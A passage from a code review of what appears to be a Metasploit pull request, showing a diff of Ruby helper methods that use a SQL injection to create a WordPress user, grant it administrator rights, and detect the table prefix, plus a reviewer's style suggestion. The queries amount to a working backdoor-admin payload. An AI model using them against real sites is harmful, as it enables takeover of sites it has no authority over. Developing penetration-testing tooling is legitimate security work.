lib/msf/core/exploit/remote/http/wordpress/sqli.rb

```diff
@@ -0,0 +1,181 @@
+    # @return [void]
+    def wordpress_sqli_create_user(username, password, email, table_prefix)
+      user_query = <<-SQL
+              INSERT INTO #{table_prefix}users (user_login, user_pass, user_nicename, user_email, user_registered, user_status, display_name)
+              SELECT '#{username}', MD5('#{password}'), '#{username}', '#{email}', NOW(), 0, '#{username}'
+              FROM DUAL
+              WHERE NOT EXISTS (SELECT 1 FROM #{table_prefix}users WHERE user_login = '#{username}')
+              LIMIT 1
+      SQL
+
+      update_query = <<-SQL
+              UPDATE #{table_prefix}users
+              SET user_pass = MD5('#{password}'),
+                  user_nicename = '#{username}',
+                  user_email = '#{email}',
+                  display_name = '#{username}'
+              WHERE user_login = '#{username}'
+      SQL
+
+      @sqli.raw_run_sql(user_query.strip.gsub(/\s+/, ' '))
+      @sqli.raw_run_sql(update_query.strip.gsub(/\s+/, ' '))
+
+      print_status("{WPSQLi} User '#{username}' created or updated successfully.")
+    end
+
+    # Grant admin privileges to the specified user by creating or updating the appropriate meta entry.
+    #
+    # This method either creates a new entry in the 'usermeta' table or updates an existing one
+    # to grant administrator capabilities to the specified user. If the entry for the user's
+    # capabilities already exists, it will be updated to assign administrator privileges.
+    # If the entry does not exist, a new one will be created.
+    #
+    # @param username [String] The username of the user to grant privileges to.
+    # @param table_prefix [String] The prefix of the WordPress database tables.
+    # @return [void]
+    def wordpress_sqli_grant_admin_privileges(username, table_prefix)
+      admin_query = <<-SQL
+              INSERT INTO #{table_prefix}usermeta (user_id, meta_key, meta_value)
+              VALUES (
+                (SELECT ID FROM #{table_prefix}users WHERE user_login = '#{username}'),
+                '#{table_prefix}capabilities', 'a:1:{s:13:"administrator";s:1:"1";}'
+              )
+              ON DUPLICATE KEY UPDATE
+              meta_value = 'a:1:{s:13:"administrator";s:1:"1";}'
+      SQL
+
+      @sqli.raw_run_sql(admin_query.strip.gsub(/\s+/, ' '))
+      print_status("{WPSQLi} Admin privileges granted or updated for user '#{username}'.")
+    end
+
+    # Identify the table prefix for the WordPress installation
+    #
+    # @return [String] The detected table prefix
+    # @raise [Failure::UnexpectedReply] If the table prefix could not be detected
+    def wordpress_sqli_identify_table_prefix
+      default_prefix_check = "SELECT 0 FROM information_schema.tables WHERE table_name = 'wp_users'"
+      result = @sqli.run_sql(default_prefix_check)&.to_i
+
+      if result == 0
+        prefix = 'wp_'
+        print_status("{WPSQLi} Retrieved default table prefix: 'wp_'")
+      else
```

Comment:
```suggestion
      if result == 0
        print_status("{WPSQLi} Retrieved default table prefix: 'wp_'")
        return 'wp_'
      end
```

so you can reduce nested indentation level